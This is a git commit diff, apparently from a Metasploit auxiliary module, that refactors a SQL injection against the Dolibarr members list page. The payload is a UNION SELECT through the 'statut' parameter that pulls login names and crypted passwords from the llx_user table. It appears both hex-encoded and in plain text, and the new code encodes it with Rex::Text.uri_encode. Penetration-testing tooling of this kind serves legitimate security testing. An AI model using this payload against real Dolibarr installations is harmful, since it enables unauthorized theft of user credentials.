using uri_encode
parent
b1151b9d12
commit
aa9d0d7c6c
|
@ -72,8 +72,12 @@ class MetasploitModule < Msf::Auxiliary
|
|||
end
|
||||
|
||||
def get_info(cookies)
|
||||
# union select 0,1,login,pass_crypted,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from llx_user #
|
||||
inject_uri = target_uri.path << "/adherents/list.php?leftmenu=members&statut=%31%29%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%30%2c%31%2c%6c%6f%67%69%6e%2c%70%61%73%73%5f%63%72%79%70%74%65%64%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2c%32%35%2c%32%36%2c%32%37%2c%32%38%20%66%72%6f%6d%20%6c%6c%78%5f%75%73%65%72%20%23"
|
||||
inject_uri = target_uri.path.end_with?('index.php') ? target_uri.path.gsub('index.php', '') : target_uri.path
|
||||
inject_uri <<= "/adherents/list.php?leftmenu=members&statut="
|
||||
cmd = "1) union select 0,1,login,pass_crypted,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from llx_user #"
|
||||
cmd = Rex::Text.uri_encode(cmd, 'hex-all')
|
||||
inject_uri <<= cmd
|
||||
|
||||
inject_res = send_request_cgi(
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(inject_uri),
|
||||
|
|
Loading…
Reference in New Issue